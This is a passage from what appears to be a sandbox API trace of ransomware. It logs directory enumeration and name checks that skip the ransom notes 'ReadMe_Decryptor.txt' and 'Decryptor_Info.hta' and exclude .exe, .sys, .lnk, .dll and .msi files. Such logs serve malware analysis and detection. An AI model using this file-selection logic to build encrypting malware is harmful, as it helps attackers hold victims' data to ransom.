(HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781c80 [0084.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.597] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a388960, ftCreationTime.dwHighDateTime=0x1d42023, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 1 [0084.597] lstrcmpW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2=".") returned 1 [0084.597] lstrcmpW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="..") returned 1 [0084.597] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.597] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.597] PathFindExtensionW (pszPath="d93f411851d7c929.customDestinations-ms") returned=".customDestinations-ms" [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781d98 [0084.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.598] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a388960, ftCreationTime.dwHighDateTime=0x1d42023, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 0 [0084.598] FindClose (in: hFindFile=0x7810d0 | out: hFindFile=0x7810d0) returned 1 [0084.599] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe469a180, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe469a180, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe469a180, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="de8rz.mkv.lnk", cAlternateFileName="DE8RZM~1.LNK")) returned 1 [0084.599] lstrcmpW (lpString1="de8rz.mkv.lnk", lpString2=".") returned 1 [0084.599] lstrcmpW (lpString1="de8rz.mkv.lnk", lpString2="..") returned 1 [0084.599] lstrcmpiW (lpString1="de8rz.mkv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.599] lstrcmpiW (lpString1="de8rz.mkv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.600] PathFindExtensionW (pszPath="de8rz.mkv.lnk") returned=".lnk" [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.600] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d720c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d720c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d720c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="de9VWkcBua.lnk", cAlternateFileName="DE9VWK~1.LNK")) returned 1 [0084.600] lstrcmpW (lpString1="de9VWkcBua.lnk", lpString2=".") returned 1 [0084.600] lstrcmpW (lpString1="de9VWkcBua.lnk", lpString2="..") returned 1 [0084.600] lstrcmpiW (lpString1="de9VWkcBua.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.600] lstrcmpiW (lpString1="de9VWkcBua.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.600] PathFindExtensionW (pszPath="de9VWkcBua.lnk") returned=".lnk" [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.600] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.600] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.600] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.600] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.600] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.600] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.600] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.600] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.601] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.601] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.601] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.601] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.601] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4993d00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4993d00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4993d00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1fa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="di02.lnk", cAlternateFileName="")) returned 1 [0084.601] lstrcmpW (lpString1="di02.lnk", lpString2=".") returned 1 [0084.601] lstrcmpW (lpString1="di02.lnk", lpString2="..") returned 1 [0084.601] lstrcmpiW (lpString1="di02.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.601] lstrcmpiW (lpString1="di02.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.601] PathFindExtensionW (pszPath="di02.lnk") returned=".lnk" [0084.601] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.601] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.601] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.601] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42499a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe42499a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe42499a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="duNAoMsaky.lnk", cAlternateFileName="DUNAOM~1.LNK")) returned 1 [0084.601] lstrcmpW (lpString1="duNAoMsaky.lnk", lpString2=".") returned 1 [0084.601] lstrcmpW (lpString1="duNAoMsaky.lnk", lpString2="..") returned 1 [0084.748] lstrcmpiW (lpString1="duNAoMsaky.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.748] lstrcmpiW (lpString1="duNAoMsaky.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.748] PathFindExtensionW (pszPath="duNAoMsaky.lnk") returned=".lnk" [0084.748] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.748] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.748] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.748] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2593040, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4de44e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4de44e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xe64, dwReserved0=0x0, dwReserved1=0x0, cFileName="E T-VRRSTs.lnk", cAlternateFileName="ET-VRR~1.LNK")) returned 1 [0084.748] lstrcmpW (lpString1="E T-VRRSTs.lnk", lpString2=".") returned 1 [0084.749] lstrcmpW (lpString1="E T-VRRSTs.lnk", lpString2="..") returned 1 [0084.749] lstrcmpiW (lpString1="E T-VRRSTs.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.749] lstrcmpiW (lpString1="E T-VRRSTs.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.749] PathFindExtensionW (pszPath="E T-VRRSTs.lnk") returned=".lnk" [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.749] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e56900, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4e56900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4e56900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x13e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="E T0i.lnk", cAlternateFileName="ET0I~1.LNK")) returned 1 [0084.749] lstrcmpW (lpString1="E T0i.lnk", lpString2=".") returned 1 [0084.749] lstrcmpW (lpString1="E T0i.lnk", lpString2="..") returned 1 [0084.749] lstrcmpiW (lpString1="E T0i.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.749] lstrcmpiW (lpString1="E T0i.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.749] PathFindExtensionW (pszPath="E T0i.lnk") returned=".lnk" [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.749] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.749] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f9c0e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3f9c0e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3f9c0e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x25c, dwReserved0=0x0, dwReserved1=0x0, cFileName="e6vzzyd4iS6Nzn0.lnk", cAlternateFileName="E6VZZY~1.LNK")) returned 1 [0084.749] lstrcmpW (lpString1="e6vzzyd4iS6Nzn0.lnk", lpString2=".") returned 1 [0084.749] lstrcmpW (lpString1="e6vzzyd4iS6Nzn0.lnk", lpString2="..") returned 1 [0084.749] lstrcmpiW (lpString1="e6vzzyd4iS6Nzn0.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.750] lstrcmpiW (lpString1="e6vzzyd4iS6Nzn0.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.750] PathFindExtensionW (pszPath="e6vzzyd4iS6Nzn0.lnk") returned=".lnk" [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.750] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe413f000, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe413f000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe413f000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1437, dwReserved0=0x0, dwReserved1=0x0, cFileName="eIUOp8l g.lnk", cAlternateFileName="EIUOP8~1.LNK")) returned 1 [0084.750] lstrcmpW (lpString1="eIUOp8l g.lnk", lpString2=".") returned 1 [0084.750] lstrcmpW (lpString1="eIUOp8l g.lnk", lpString2="..") returned 1 [0084.750] lstrcmpiW (lpString1="eIUOp8l g.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.750] lstrcmpiW (lpString1="eIUOp8l g.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.750] PathFindExtensionW (pszPath="eIUOp8l g.lnk") returned=".lnk" [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.750] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.750] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e307a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4e307a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4e307a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf02, dwReserved0=0x0, dwReserved1=0x0, cFileName="eOFt1x.lnk", cAlternateFileName="")) returned 1 [0084.750] lstrcmpW (lpString1="eOFt1x.lnk", lpString2=".") returned 1 [0084.750] lstrcmpW (lpString1="eOFt1x.lnk", lpString2="..") returned 1 [0084.750] lstrcmpiW (lpString1="eOFt1x.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.750] lstrcmpiW (lpString1="eOFt1x.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.750] PathFindExtensionW (pszPath="eOFt1x.lnk") returned=".lnk" [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.751] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41fd6e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe41fd6e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe41fd6e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf83, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPd_PqpfkATvsaO.lnk", cAlternateFileName="EPD_PQ~1.LNK")) returned 1 [0084.751] lstrcmpW (lpString1="EPd_PqpfkATvsaO.lnk", lpString2=".") returned 1 [0084.751] lstrcmpW (lpString1="EPd_PqpfkATvsaO.lnk", lpString2="..") returned 1 [0084.751] lstrcmpiW (lpString1="EPd_PqpfkATvsaO.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.751] lstrcmpiW (lpString1="EPd_PqpfkATvsaO.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.751] PathFindExtensionW (pszPath="EPd_PqpfkATvsaO.lnk") returned=".lnk" [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.751] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3662ba0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3662ba0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3662ba0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="F2p7o.lnk", cAlternateFileName="")) returned 1 [0084.751] lstrcmpW (lpString1="F2p7o.lnk", lpString2=".") returned 1 [0084.751] lstrcmpW (lpString1="F2p7o.lnk", lpString2="..") returned 1 [0084.751] lstrcmpiW (lpString1="F2p7o.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.751] lstrcmpiW (lpString1="F2p7o.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.751] PathFindExtensionW (pszPath="F2p7o.lnk") returned=".lnk" [0084.751] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.752] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0608cc0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe0608cc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe062ee20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa58, dwReserved0=0x0, dwReserved1=0x0, cFileName="f41TDB3cCDdGN.lnk", cAlternateFileName="F41TDB~1.LNK")) returned 1 [0084.752] lstrcmpW (lpString1="f41TDB3cCDdGN.lnk", lpString2=".") returned 1 [0084.752] lstrcmpW (lpString1="f41TDB3cCDdGN.lnk", lpString2="..") returned 1 [0084.752] lstrcmpiW (lpString1="f41TDB3cCDdGN.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.752] lstrcmpiW (lpString1="f41TDB3cCDdGN.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.752] PathFindExtensionW (pszPath="f41TDB3cCDdGN.lnk") returned=".lnk" [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.752] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a2c280, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4a2c280, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4a2c280, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FFPbqnA-hPuQPBrPE4c.lnk", cAlternateFileName="FFPBQN~1.LNK")) returned 1 [0084.752] lstrcmpW (lpString1="FFPbqnA-hPuQPBrPE4c.lnk", lpString2=".") returned 1 [0084.752] lstrcmpW (lpString1="FFPbqnA-hPuQPBrPE4c.lnk", lpString2="..") returned 1 [0084.752] lstrcmpiW (lpString1="FFPbqnA-hPuQPBrPE4c.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.752] lstrcmpiW (lpString1="FFPbqnA-hPuQPBrPE4c.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.752] PathFindExtensionW (pszPath="FFPbqnA-hPuQPBrPE4c.lnk") returned=".lnk" [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.752] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.752] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41fd6e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe41fd6e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe41fd6e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fujhI IgaA63REochV.flv.lnk", cAlternateFileName="FUJHII~1.LNK")) returned 1 [0084.753] lstrcmpW (lpString1="fujhI IgaA63REochV.flv.lnk", lpString2=".") returned 1 [0084.753] lstrcmpW (lpString1="fujhI IgaA63REochV.flv.lnk", lpString2="..") returned 1 [0084.753] lstrcmpiW (lpString1="fujhI IgaA63REochV.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.753] lstrcmpiW (lpString1="fujhI IgaA63REochV.flv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.753] PathFindExtensionW (pszPath="fujhI IgaA63REochV.flv.lnk") returned=".lnk" [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.753] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f75f80, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3f75f80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3f75f80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf99, dwReserved0=0x0, dwReserved1=0x0, cFileName="FYEc-4FdotjJ_2tns.lnk", cAlternateFileName="FYEC-4~1.LNK")) returned 1 [0084.753] lstrcmpW (lpString1="FYEc-4FdotjJ_2tns.lnk", lpString2=".") returned 1 [0084.753] lstrcmpW (lpString1="FYEc-4FdotjJ_2tns.lnk", lpString2="..") returned 1 [0084.753] lstrcmpiW (lpString1="FYEc-4FdotjJ_2tns.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.753] lstrcmpiW (lpString1="FYEc-4FdotjJ_2tns.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.753] PathFindExtensionW (pszPath="FYEc-4FdotjJ_2tns.lnk") returned=".lnk" [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.753] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.753] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44d1100, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe44d1100, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe44d1100, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x0, cFileName="GfH 1Ie6wOQzY 5k4DI.lnk", cAlternateFileName="GFH1IE~1.LNK")) returned 1 [0084.753] lstrcmpW (lpString1="GfH 1Ie6wOQzY 5k4DI.lnk", lpString2=".") returned 1 [0084.753] lstrcmpW (lpString1="GfH 1Ie6wOQzY 5k4DI.lnk", lpString2="..") returned 1 [0084.754] lstrcmpiW (lpString1="GfH 1Ie6wOQzY 5k4DI.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.754] lstrcmpiW (lpString1="GfH 1Ie6wOQzY 5k4DI.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.754] PathFindExtensionW (pszPath="GfH 1Ie6wOQzY 5k4DI.lnk") returned=".lnk" [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.754] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf61d9a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4a06120, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4a06120, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1390, dwReserved0=0x0, dwReserved1=0x0, cFileName="gfnKOcqFgrM6L.lnk", cAlternateFileName="GFNKOC~1.LNK")) returned 1 [0084.754] lstrcmpW (lpString1="gfnKOcqFgrM6L.lnk", lpString2=".") returned 1 [0084.754] lstrcmpW (lpString1="gfnKOcqFgrM6L.lnk", lpString2="..") returned 1 [0084.754] lstrcmpiW (lpString1="gfnKOcqFgrM6L.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.754] lstrcmpiW (lpString1="gfnKOcqFgrM6L.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.754] PathFindExtensionW (pszPath="gfnKOcqFgrM6L.lnk") returned=".lnk" [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.754] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.754] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4080920, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4080920, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4080920, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xedc, dwReserved0=0x0, dwReserved1=0x0, cFileName="gwPqcUu.flv.lnk", cAlternateFileName="GWPQCU~1.LNK")) returned 1 [0084.754] lstrcmpW (lpString1="gwPqcUu.flv.lnk", lpString2=".") returned 1 [0084.754] lstrcmpW (lpString1="gwPqcUu.flv.lnk", lpString2="..") returned 1 [0084.754] lstrcmpiW (lpString1="gwPqcUu.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.754] lstrcmpiW 